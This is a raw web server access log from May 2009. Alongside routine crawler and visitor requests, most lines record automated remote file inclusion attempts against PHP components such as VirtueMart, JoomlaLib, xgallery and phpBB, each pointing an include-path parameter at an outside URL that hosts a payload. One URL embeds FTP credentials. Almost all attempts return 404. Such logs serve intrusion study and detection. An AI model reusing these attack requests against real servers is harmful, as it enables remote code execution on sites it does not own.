209.59.12.99 - - [08/May/2009:00:25:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.197.202.64 - - [08/May/2009:00:25:11 -0400] "GET /logs/access_log.Q108100100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:25:11 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
110.45.145.92 - - [08/May/2009:00:25:26 -0400] "GET /logs/access_log.Q108100100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
62.116.168.108 - - [08/May/2009:00:25:31 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:00:25:31 -0400] "GET /logs/access_log.Q108100100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:26:05 -0400] "GET /logs/access_log.Q109041500%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:26:12 -0400] "GET /logs/access_log.Q109041500%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.30.142.94 - - [08/May/2009:00:26:13 -0400] "GET /scripts/browser_konq.js HTTP/1.0" 200 6887 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.176.226.180 - - [08/May/2009:00:26:25 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
81.176.226.180 - - [08/May/2009:00:26:25 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
81.176.226.180 - - [08/May/2009:00:26:25 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
110.45.145.92 - - [08/May/2009:00:26:25 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
122.116.178.20 - - [08/May/2009:00:26:42 -0400] "GET /logs/access_log.Q109041900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:26:47 -0400] "GET /logs/access_log.Q109041900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.30.142.94 - - [08/May/2009:00:26:57 -0400] "GET /images/_notes/contact_fax.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.176.226.180 - - [08/May/2009:00:26:58 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.30.142.94 - - [08/May/2009:00:27:45 -0400] "GET /scripts/browser_ice.js HTTP/1.0" 200 7226 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.109.129 - - [08/May/2009:00:27:54 -0400] "GET /logs/access_log.Q108081900/e404.php?DOCUMENT_ROOT=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:27:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006EB84246609700F0DB08U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.142.94 - - [08/May/2009:00:28:01 -0400] "GET /scripts/dqm_loader.js HTTP/1.0" 200 3374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.20.225.45 - - [08/May/2009:00:28:47 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:00:29:16 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:00:29:16 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:00:29:17 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
67.227.156.113 - - [08/May/2009:00:29:40 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.227.156.113 - - [08/May/2009:00:29:40 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.227.156.113 - - [08/May/2009:00:29:40 -0400] "GET /logs/access_log.Q108112400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.227.156.113 - - [08/May/2009:00:30:02 -0400] "GET /logs/access_log.Q108101700//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.146.255.34 - - [08/May/2009:00:30:41 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.146.255.34 - - [08/May/2009:00:30:41 -0400] "GET /logs/access_log.Q108112400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.146.255.34 - - [08/May/2009:00:30:41 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:00:30:44 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/albid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
218.146.255.34 - - [08/May/2009:00:30:45 -0400] "GET /logs/access_log.Q108101700//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:00:30:45 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/albid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
81.176.226.180 - - [08/May/2009:00:30:45 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/albid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
218.146.255.34 - - [08/May/2009:00:30:47 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.146.255.34 - - [08/May/2009:00:30:47 -0400] "GET /logs/access_log.Q108112400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.146.255.34 - - [08/May/2009:00:30:47 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.146.255.34 - - [08/May/2009:00:30:51 -0400] "GET /logs/access_log.Q108101700//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:31:06 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:00:31:06 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:00:31:06 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
195.20.225.45 - - [08/May/2009:00:31:07 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
121.165.73.157 - - [08/May/2009:00:31:12 -0400] "GET /logs/access_log.Q108112400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
121.165.73.157 - - [08/May/2009:00:31:12 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
121.165.73.157 - - [08/May/2009:00:31:12 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
121.165.73.157 - - [08/May/2009:00:31:12 -0400] "GET /logs/access_log.Q108101700//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
222.239.76.25 - - [08/May/2009:00:32:05 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.53.250.98 - - [08/May/2009:00:32:13 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
122.116.178.20 - - [08/May/2009:00:32:21 -0400] "GET /logs/access_log.Q108100100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:32:21 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.98.184.58 - - [08/May/2009:00:32:25 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.98.184.58 - - [08/May/2009:00:32:27 -0400] "GET /logs/access_log.Q108112400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.98.184.58 - - [08/May/2009:00:32:27 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:00:32:37 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.68.188.206 - - [08/May/2009:00:32:38 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.68.188.206 - - [08/May/2009:00:32:38 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
122.116.178.20 - - [08/May/2009:00:32:40 -0400] "GET /logs/access_log.Q108100100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:32:40 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.98.184.58 - - [08/May/2009:00:32:41 -0400] "GET /logs/access_log.Q108101700//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:00:32:44 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:00:32:44 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:00:32:45 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:00:32:55 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.68.188.206 - - [08/May/2009:00:32:55 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.68.188.206 - - [08/May/2009:00:32:55 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.176.226.180 - - [08/May/2009:00:33:27 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
74.58.86.139 - - [08/May/2009:00:33:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [08/May/2009:00:33:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [08/May/2009:00:33:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [08/May/2009:00:33:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
218.146.255.34 - - [08/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
210.188.205.193 - - [08/May/2009:00:34:15 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
210.188.205.193 - - [08/May/2009:00:34:15 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
210.188.205.193 - - [08/May/2009:00:34:15 -0400] "GET /logs/access_log.Q108112400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [08/May/2009:00:34:26 -0400] "GET /logs/access_log.Q108091000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
210.188.205.193 - - [08/May/2009:00:34:27 -0400] "GET /logs/access_log.Q108101700//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:00:34:31 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
218.146.255.34 - - [08/May/2009:00:34:57 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:00:35:00 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
202.53.250.98 - - [08/May/2009:00:35:28 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:00:35:49 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
67.227.156.113 - - [08/May/2009:00:35:52 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.227.156.113 - - [08/May/2009:00:36:02 -0400] "GET /logs/access_log.Q108101700%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.146.255.34 - - [08/May/2009:00:36:18 -0400] "GET /logs/error_log.Q108112400%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
110.45.145.92 - - [08/May/2009:00:36:33 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:00:36:33 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:00:36:33 -0400] "GET /logs/access_log.Q109041500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:00:36:51 -0400] "GET /logs/access_log.Q109041900//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.146.255.34 - - [08/May/2009:00:36:58 -0400] "GET /logs/error_log.Q108112400%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
210.188.205.193 - - [08/May/2009:00:37:53 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
217.199.222.19 - - [08/May/2009:00:37:57 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
210.188.205.193 - - [08/May/2009:00:37:58 -0400] "GET /logs/access_log.Q108101700%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
72.30.142.94 - - [08/May/2009:00:38:06 -0400] "GET /scripts/prototype.js HTTP/1.0" 200 124136 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.94 - - [08/May/2009:00:38:18 -0400] "GET /scripts/browser_ie.js HTTP/1.0" 200 10686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.199.222.19 - - [08/May/2009:00:39:34 -0400] "GET /logs/access_log.Q109042500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.145.92 - - [08/May/2009:00:39:40 -0400] "GET /logs/access_log.Q108100100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:00:39:40 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
210.188.205.193 - - [08/May/2009:00:40:05 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
210.188.205.193 - - [08/May/2009:00:40:05 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
210.188.205.193 - - [08/May/2009:00:40:07 -0400] "GET /logs/access_log.Q109042600%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:40:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006EB84246305700F6DB08U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.19.241.61 - - [08/May/2009:00:40:59 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:00:40:59 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:00:40:59 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
201.232.54.48 - - [08/May/2009:00:41:01 -0400] "GET /logs/access_log.Q108112300//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
201.232.54.48 - - [08/May/2009:00:41:01 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [08/May/2009:00:41:01 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:00:41:39 -0400] "GET /logs/access_log.Q108122400//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:00:41:39 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.812"
